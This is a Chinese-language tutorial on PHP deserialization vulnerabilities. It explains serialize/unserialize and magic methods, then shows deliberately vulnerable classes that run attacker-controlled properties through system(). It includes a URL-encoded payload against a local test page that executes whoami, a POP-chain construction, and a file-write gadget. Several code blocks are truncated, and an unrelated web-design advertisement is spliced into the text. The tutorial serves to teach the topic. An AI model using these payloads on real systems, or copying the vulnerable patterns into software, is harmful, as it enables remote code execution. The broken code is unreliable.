php反序列化漏洞

0x00 序列化

所有php里面的值都可以使用函数serialize()来返回一个包含字节流的字符串来表示。unserialize()函数能够重新把字符串变回php原来的值。 序列化一个对象将会保存对象的所有变量，但是不会保存对象的方法，只会保存类的名字。 所有php里面的值都可以使用函数
serialize()
来返回一个包含字节流的字符串来表示。
unserialize()
函数能够重新把字符串变回php原来的值。 序列化一个对象将会保存对象的所有变量，但是不会保存对象的方法，只会保存类的名字。

序列化的例子

创新互联专业为企业提供徐汇网站建设、徐汇做网站、徐汇网站设计、徐汇网站制作等企业网站建设、网页设计与制作、徐汇企业网站模板建站服务，十余年徐汇做网站经验，不只是建网站，更提供有价值的思路和整体网络服务。

 1,1.2,false );
class ClassName   {
    var $var_name = 1;
    function  myfunction(){
        return "1";
    }
}
   $arrayName = array($var_int,$var_str,$var_float,$var_bool,$var_arr,new ClassName ());

   foreach ($arrayName as $key => $value) {
    echo serialize($value)."
";
   }

结果是

i:1;
s:3:"123";
d:1.2;
b:1;
a:3:{i:1;i:1;i:2;d:1.2;i:3;b:0;}
O:9:"ClassName":1:{s:8:"var_name";i:1;}

从例子中我们可以看到，变量，数组，对象可以被序列化。变量的值会被保存下来。以:隔开，类名会被保存下来，类变量，类变量名和类变量值会被保存下来，类方法不会被保存起来。

0x01 反序列化

反序列化就是将序列化后的字符串转化回数组和对象
看例子

 1,1.2,false );
$un_class_str = 'O:9:"ClassName":1:{s:8:"var_name";i:1;}';
var_dump(unserialize($un_arr_str));
$O = unserialize($un_class_str);
// var_dump($O);
var_dump($O->var_name);

这里的结果是

array(3) { [1]=> int(1) [2]=> float(1.2) [3]=> bool(false) } 
NULL

比较奇怪的是为什么第二个会是NULL。因为将对象序列化之后，只是保存它的关键数据，对于这个类的具体内容一无所知。所以反序列回一个对象的时候，需要反序列的上下文中存在模板(这里就是类的定义)。

0x02 魔术函数

PHP 将所有以 __（两个下划线）开头的类方法保留为魔术方法。
下面举一个例子。

class ClassName  {

    function __construct(){
        echo "Hello,I am __construct";
    }
}

new ClassName();

这里的输出结果是

Hello,I am __construct

其实这里的一个对象实例化的过程中默认会调用的__construct()。
php常用的魔术函数有

__construct()， __destruct()， __call()， __callStatic()， __get()， __set()， __isset()， __unset()， __sleep()， __wakeup()， __toString()， __invoke()， __set_state()， __clone() 和 __debugInfo()

这里们并非每个都会在这里面用到，下面用一个例子来说下看几个常用到的魔术函数。

";
    }
    function __destruct(){
        echo "Hello,I am __destruct"."
";
    }
    function __wakeup(){
        echo "Hello,I am __wakeup"."
";
    }
    function __sleep(){
        echo "Hello,I am __sleep"."
";
        return array($this->name);
    }
    function __get($name){
        echo "Hello,I am __get"."
";
        return $this->name;
    }
    function __toString(){
        echo "Hello,I am __toString"."
";
        return "Hello";
    }
}

$O = new ClassName();
$s= serialize($O);
echo $s."
";
$O = unserialize($s);
$O."
";
$O->nothing;

从例子我们可以看出，当初序列化一个对象是默认会调用__sleep，反序列化是会调用__wakeup，而__construct会在实例化一个对象是被调用，__desturct会在对象不再使用或者程序退出时自动调用, __toString会在对象被当做字符串时使用(特别注意字符串连接符.)。__get会在读取不可访问的属性的值的时候调用

0x03 反序列化漏洞

先举一个反序列化漏洞例子

ip);
    }
}
$O = unserialize($_GET['daiker']);

我们分析这串代码，可以得出一下结论

1. 反序列化的的字符串我们可控
2. 反序列化默认会调用__wakeup()
3. 变量ip是会保存在反序列化的字符串里面的，我们可控
   所以我们下面构造payload。

然后

http://127.0.0.1/php-obj/example4.php?daiker=O%3A9%3A%22ClassName%22%3A1%3A%7Bs%3A2%3A%22ip%22%3Bs%3A7%3A%22%7Cwhoami%22%3B%7D

就可以执行whoami,所以这里就导致RCE
所以总结来讲，PHP对象注入(又叫反序列化漏洞)，需要几点条件。

1. 反序列化字符串可控
2. 有魔术方法会调用对象属性

对于反序列化的漏洞利用的效果取决于魔术方法里面对成员属性的调用方式，如上面的system()就会导致RCE，也可能是注入，任意文件上传等问题。

0x04 类变量的注意点

看下面一个例子

";
echo urlencode(serialize(new ClassName()));

看输出结果

O:9:"ClassName":3:{s:12:"ClassNamea";i:1;s:4:"*b";i:2;s:1:"c";i:3;}

O%3A9%3A%22ClassName%22%3A3%3A%7Bs%3A12%3A%22%00ClassName%00a%22%3Bi%3A1%3Bs%3A4%3A%22%00%2A%00b%22%3Bi%3A2%3Bs%3A1%3A%22c%22%3Bi%3A3%3B%7D%

attack();
    }
    function attack(){
        system($this->cmd);
    }
}
class ClassName  {
    var $class ;
    function __construct(){
        $this->class=new One();

    }
    function __wakeup(){
        $this->class->myfunction();
    }
}
$O = unserialize($_GET['daiker']);

cmd = "whoami";
    }//跟直接写 var $cmd = "whoami'，不写__construct一样，这里演示还有这种写法
}
class ClassName  {
    var $class ;
    function __construct(){
        $this->class=new Another();
    }
}
echo serialize(new ClassName());

var = "hello,wold";
        }
        function __destruct(){
            $fp=fopen("F:\\phpStudy\\WWW\\unse\\hello.php","w");
            fputs($fp,$this->var);
            fclose($fp);
        }
 }

$content = $_POST['content'];
$object = unserialize($content);
?>

  function __wakeup(){
            $this->var = "hello,wold";
        }